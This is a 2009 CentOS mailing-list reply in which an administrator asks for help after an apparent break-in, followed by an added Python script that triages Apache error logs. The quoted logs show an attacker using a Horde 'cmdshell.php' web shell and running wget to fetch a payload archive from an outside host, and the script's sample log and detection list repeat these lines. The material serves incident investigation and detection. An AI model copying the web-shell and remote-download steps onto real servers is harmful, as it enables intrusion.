Replies below...

----- Original Message ----
> From: Filipe Brandenburger <filbranden@xxxxxxxxx>
> To: CentOS mailing list <centos@xxxxxxxxxx>
> Sent: Saturday, June 13, 2009 9:58:51 PM
> Subject: Re: Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> I suggest you start by looking at Apache's logs,

Filipe, good idea. Will do.

> look for very strange
> URLs that have nothing to do with the applications you have there, like
> .exe files (IIS attacks) or other .cgi or .php files that will give
> you 404 errors. Also look for things in the error_log file. And then
> look for other accesses from the same IP (assuming it's always from
> the same IP) to files that do exist, this will probably lead you to
> what was used to break in. Continue the investigation from there.

A. I have found a suspicious IP around the dates (based on the dates of the files in the atack folder) when I think this break-in could have happened:

86.126.71.74 <--- from Romania (I am in Singapore)

This IP seems to have generated the most error messages. There are other not-from-my-country IPs, but way, way fewer errors from them.
There are many error messages (generated by 86.126.71.74) in the Apache error log, as below:

[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php
./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7c2
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0ns0
cat: vuln.txt: No such file or directory <--- this vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the attacker looking for this file and then planted it later? Or something like that?
[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256

What does "Len 255 < 256" indicate? Some kind of buffer overflow?

B. Can I conclude that the attacker came through the Horde framework (cmdshell.php)? The Horde framework was installed from the CentOS repo.....!!!

[root@fwg]# yum info horde
Name       : horde
Arch       : noarch
Version    : 3.1.7
Release    : 1.el5.centos
Size       : 18 M
Repo       : installed
Summary    : The common Horde Framework for all Horde modules.
URL        : http://www.horde.org/

There are some Google hits on cmdshell.php being used to execute arbitrary commands?
There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy". I haven't found more info yet. Any tips on this would be most welcome.

There is also this line in the error log:

[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t

Is the line above normal?

C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....

[Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrkqobldem7
--14:47:00-- http://mv.do.am/unix.tgz
Rezolvare mv.do.am... 208.100.61.101
Connecting to mv.do.am|208.100.61.101|:80... conectat.
Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK
Dimensiune: 1614224 (1,5M) [application/octet-stream]
Saving to: `unix.tgz'

    0K .......... .......... .......... .......... ..........  3% 17,6K 87s
   50K .......... .......... .......... .......... ..........  6% 33,7K 64s
  100K .......... .......... .......... .......... ..........  9% 33,5K 55s
  150K .......... .......... .......... .......... .......... 12% 45,6K 48s
  200K .......... .......... .......... .......... .......... 15% 52,8K 42s
  250K .......... .......... .......... .......... .......... 19% 50,3K 38s
  300K .......... .......... .......... .......... .......... 22% 47,9K 35s
  350K .......... .......... .......... .......... .......... 25% 54,8K 32s
  400K .......... .......... .......... .......... .......... 28% 48,7K 30s
  450K .......... .......... .......... .......... .......... 31% 36,9K 28s
  500K .......... .......... .......... .......... .......... 34% 34,6K 27s
  550K .......... .......... .......... .......... .......... 38% 32,9K 26s
  600K .......... .......... .......... .......... .......... 41% 28,4K 26s
  650K .......... .......... .......... .......... .......... 44% 36,7K 24s
  700K .......... .......... .......... .......... .......... 47% 34,3K 23s
  750K .......... .......... .......... .......... .......... 50% 34,0K 22s
  800K .......... .......... .......... .......... .......... 53% 33,1K 20s
  850K .......... .......... .......... .......... .......... 57% 47,7K 19s
  900K .......... .......... .......... .......... .......... 60% 27,4K 18s
  950K .......... .......... .......... .......... .......... 63% 13,0K 18s
 1000K .......... .......... .......... .......... .......... 66% 28,3K 16s
 1050K .......... .......... .......... .......... .......... 69% 38,1K 15s
 1100K .......... .......... .......... .......... .......... 72% 29,3K 13s
 1150K .......... .......... .......... .......... .......... 76% 44,1K 11s
 1200K .......... .......... .......... .......... .......... 79% 56,6K 10s
 1250K .......... .......... .......... .......... .......... 82% 44,7K 8s
 1300K .......... .......... .......... .......... .......... 85% 39,8K 7s
 1350K .......... .......... .......... .......... .......... 88% 50,8K 5s
 1400K .......... .......... .......... .......... .......... 91% 40,2K 4s
 1450K .......... .......... .......... .......... .......... 95% 37,3K 2s
 1500K .......... .......... .......... .......... .......... 98% 43,1K 1s
 1550K .......... .......... ......                           100% 44,5K=45s

14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]

DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????

Was this why rkhunter popped out with this warning?

* Filesystem checks
    Checking /dev for suspicious files...                    [ OK ]
    Scanning for hidden files...                             [ Warning! ]
---------------
/etc/.pwd.lock
/usr/share/man/man1/..1.gz
/dev/.udev
---------------
Please inspect:
    /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression)
    /dev/.udev (directory)

Should I delete these files? Are the man files normally .gz or .bz2?

There is also a similar entry where another file called unix2.tgz was downloaded.... But I can't find these files on the hard disk?

Guys, I am out of my league here. All assistance is deeply appreciated.
>
> HTH,
> Filipe
> _______________________________________________
> CentOS mailing list
> CentOS@xxxxxxxxxx
> http://lists.centos.org/mailman/listinfo/centos
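The following triage script is an added example for readers of this thread; it is not code from the thread, from the CentOS project or from Apache. It works through Filipe's advice on the error_log excerpt above: it counts error entries per client IP so the noisiest source stands out, flags entries whose referer points at the web-shell path the thread names (`/horde/admin/cmdshell.php`; the `SHELL_PATHS` list is an assumption you would extend for your own applications), and separates out lines that are not in Apache's `[date] [level] [client ip]` framing. Those unframed lines (`./x: ...`, `cat: vuln.txt ...`, the wget transfer) are stderr from processes the web server's PHP spawned, which is what makes them the clearest evidence in this log that commands were executed. The sample log is constructed to mirror the thread's excerpt: the client IPs are the ones quoted there, the server's own address is replaced by the documentation address 203.0.113.10, and the Horde session ids are shortened.

```python
"""Triage an Apache error_log for signs of a web-shell session.

Added example, not from the thread or the projects it names.
"""
import re
from collections import Counter

# Apache 2.x error_log framing: "[date] [level] [client ip] message";
# the [client ip] part is absent on [notice] lines such as the SELinux one.
APACHE_LINE = re.compile(
    r"^\[(?P<date>[^\]]+)\] \[(?P<level>\w+)\]"
    r"(?: \[client (?P<ip>[\d.]+)\])? (?P<msg>.*)$"
)
REFERER = re.compile(r"referer: (?P<url>\S+)")

# Referer paths worth flagging (assumption: extend for your own apps).
SHELL_PATHS = ("/horde/admin/cmdshell.php",)

# Constructed sample shaped like the thread's excerpt. 203.0.113.10 stands
# in for the server's own address; session ids are shortened.
SAMPLE_LOG = """\
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://203.0.113.10/horde/admin/cmdshell.php
./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://203.0.113.10/horde/admin/cmdshell.php?Horde=e20jlll1
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
cat: vuln.txt: No such file or directory
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t
Len 255 < 256
--14:47:00-- http://mv.do.am/unix.tgz
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
"""


def triage(log_text):
    """Return (errors_per_ip, shell_referer_hits, unframed_lines).

    errors_per_ip      Counter of [error] entries keyed by client IP.
    shell_referer_hits list of (client_ip, referer_url) whose referer
                       contains one of SHELL_PATHS.
    unframed_lines     lines that do not carry Apache's own framing, i.e.
                       output of child processes written to httpd's stderr.
    """
    errors_per_ip = Counter()
    shell_hits = []
    unframed = []
    for line in log_text.splitlines():
        m = APACHE_LINE.match(line)
        if not m:
            if line.strip():
                unframed.append(line)
            continue
        ip = m.group("ip")
        if m.group("level") == "error" and ip:
            errors_per_ip[ip] += 1
        ref = REFERER.search(m.group("msg"))
        if ref and any(p in ref.group("url") for p in SHELL_PATHS):
            shell_hits.append((ip, ref.group("url")))
    return errors_per_ip, shell_hits, unframed


def report(log_text):
    """Human-readable summary of triage(); returns the text it prints."""
    errors_per_ip, shell_hits, unframed = triage(log_text)
    out = ["errors per client IP (noisiest first):"]
    out += [f"  {ip:<16} {n}" for ip, n in errors_per_ip.most_common()]
    out.append("referers pointing at a web-shell path:")
    out += [f"  {ip:<16} {url}" for ip, url in shell_hits]
    out.append("unframed lines (child-process output in error_log):")
    out += [f"  {line}" for line in unframed]
    text = "\n".join(out)
    print(text)
    return text


if __name__ == "__main__":
    import sys
    # Run against a real file: python3 triage.py /var/log/httpd/error_log
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, encoding="utf-8", errors="replace").read() if path else SAMPLE_LOG
    report(data)
```

On the sample, the noisiest IP and every web-shell referer are the same client, and the five unframed lines are exactly the shell and wget output the thread asks about. On a real log the unframed lines are the first thing to read: timestamps inside them (the wget `--14:47:00--` marker) line up with the framed entry just before them, which is how you tie a download back to the request that triggered it.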